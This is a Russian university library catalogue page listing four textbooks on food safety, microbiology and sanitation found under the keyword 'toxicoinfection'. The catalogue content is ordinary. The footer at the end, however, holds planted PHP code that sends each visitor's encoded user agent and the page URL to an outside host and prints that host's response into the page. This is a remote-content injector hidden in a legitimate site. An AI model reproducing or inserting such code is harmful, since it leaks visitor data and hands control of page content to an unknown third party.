Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

281 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ТОКСИКОИНФЕКЦИЯ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 4
1. 
Позняковский В. М. Безопасность продовольственных товаров (с основами нутрициологии) [Текст] / В. М. Позняковский, 2015. - 270 с.
Ключевые слова 
БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ -- ТОВАРЫ ПРОДОВОЛЬСТВЕННЫЕ -- НУТРИЦИОЛОГИЯ -- ПИТАНИЕ - НАУКА -- ПИТАНИЕ РАЦИОНАЛЬНОЕ -- ПИТАНИЕ СБАЛАНСИРОВАННОЕ -- ПРОДУКТЫ СПЕЦИАЛЬНОГО НАЗНАЧЕНИЯ -- НОРМА ПОТРЕБЛЕНИЯ ПИЩИ -- ПИТАНИЕ - ЗДОРОВЬЕ -- ЗАГРЯЗНЕНИЕ ПРОДОВОЛЬСТВЕННОГО СЫРЬЯ -- ИНТОКСИКАЦИЯ -- ТОКСИКОИНФЕКЦИЯ -- МИКОТОКСИНЫ -- ЗАГРЯЗНЕНИЕ ХИМИЧЕСКОЕ -- ВЕЩЕСТВО АНТИБАКТЕРИАЛЬННОЕ -- ПРЕПАРАТ ГОРМОНАЛЬНЫЙ -- ДОБАВКА КОРМОВАЯ АЗОТСОДЕРЖАЩАЯ -- ЗАГРЯЗНЕНИЕ ТОКСИЧЕСКОЕ -- ПЕСТИЦИДЫ -- РЕГУЛЯТОР РОСТА РАСТЕНИЙ -- УДОБРЕНИЕ -- ВОДЫ СТОЧНЫЕ -- НИТРАТЫ -- ЗАГРЯЗНЕНИЕ РАДИОАКТИВНОЕ -- ДОБАВКА ПИЩЕВАЯ -- КОНСЕРВАНТ ПИЩЕВОЙ -- БАД -- ПРОДУКТ ГЕНЕТИЧЕСКИ МОДИФИЦИРОВАННЫЙ -- ГМИ -- ФАЛЬСИФИКАЦИЯ ПИЩЕВЫХ ПРОДУКТОВ -- БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ -- КАЧЕСТВО ПИЩЕВЫХ ПРОДУКТОВ -- СТАНДАРТ МЕЖДУНАРОДНЫЙ -- ПИТАНИЕ ЖЕНЩИН БЕРЕМЕННЫХ -- ПИТАНИЕ ДЕТЕЙ -- ПИТАНИЕ ПОДРОСТКОВ
Держатели документа (Информация об экземплярах) 
2. 
Мудрецова-Висс К. А. Микробиология, санитария и гигиена [Текст] : учеб. для студ. вузов / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2009. - 399 с.
Держатели документа (Информация об экземплярах) 
3. 
Микробиология, гигиена и санитария в торговле [Текст] : Учеб. пособие для студ. учеб. заведений сред. проф. образования и уч-ся учеб. заведений нач. проф. образования / Автор-сост. Т. П. Трушина, 2000. - 315,[1] с.
4. 
Мудрецова-Висс, Клавдия Алексеевна. Микробиология, санитария и гигиена [Текст] : Учеб. для вузов по специальностям: "Товароведение и экспертиза товаров", "Технология продуктов общественного питания", "Стандартизация и сертификация" / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2001. - 378 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2906 - 25.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.57 с.12 запросов, 0.35c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;